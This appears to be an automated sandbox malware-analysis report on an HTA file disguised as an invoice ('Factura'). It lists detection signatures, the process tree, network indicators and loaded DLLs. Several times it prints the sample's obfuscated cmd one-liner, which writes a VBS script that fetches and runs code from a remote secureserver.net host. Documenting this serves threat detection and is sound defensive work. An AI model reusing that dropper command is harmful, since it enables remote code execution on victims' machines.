Edit tour

Windows Analysis Report
Factura - XwgyvMuOAO.hta

Overview

General Information

Sample name:	Factura - XwgyvMuOAO.hta
Analysis ID:	1493145
MD5:	65e0b29205432c93c11211a9aa474ff6
SHA1:	1bcb0125fb5fb63460536b33e7b708479d5fb334
SHA256:	b7f0fa3e60b9984e1f79cb3554efc7c5c8437d79d4a74ff02ab3d1e34539f87d
Tags:	htaHUN
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Command shell drops VBS files

Obfuscated command line found

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 3788 cmdline: mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 728 cmdline: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3424 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 5352 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6476 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6188 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 3356 cmdline: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wscript.exe (PID: 2220 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2220, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3356, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , ProcessId: 2220, ProcessName: wscript.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3788, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ProcessId: 728, ProcessName: cmd.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3356, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , ProcessId: 2220, ProcessName: wscript.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5352, TargetFilename: C:\Users\Public\uoxx0.vbs

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2220, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3356, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , ProcessId: 2220, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://102.57.205.92.host.secureserver.net/g1/1	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHO	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/J	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net//g1	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net//g1Q	Avira URL Cloud: Label: malware
Source: hTTps://102.57.205.92.host.secureserver.net//	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/e	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/B	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQIC	Avira URL Cloud: Label: malware
Source: hTTps://102.57.205.92.host.secureserver.net//g	Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Factura - XwgyvMuOAO.hta

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 85.6% probability

Source: unknown

HTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.5:49706 version: TLS 1.2

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 92.205.57.102 443

Jump to behavior

Source: Joe Sandbox View

ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET //g1 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /g1/ HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET //g1 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /g1/ HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: 102.57.205.92.host.secureserver.net

Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.host.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.host.secureserver.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.host.secureserver.net//
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.host.secureserver.net//g
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.host.secureserver.net//g1
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.host.secureserverM2
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.205.92.hostC
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.57.graphy
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hTTps://102.5701
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net/
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net//g1
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net//g1Q
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQIC
Source: wscript.exe, 00000009.00000003.2052587425.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp, g1[1].htm.9.dr	String found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/
Source: wscript.exe, 00000009.00000003.2052587425.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/1
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/B
Source: wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/J
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/e
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHO

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal96.evad.winHTA@17/3@1/1

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\Public\uoxx0.vbs

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Factura - XwgyvMuOAO.hta

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo\|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo\|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo\|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo\|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
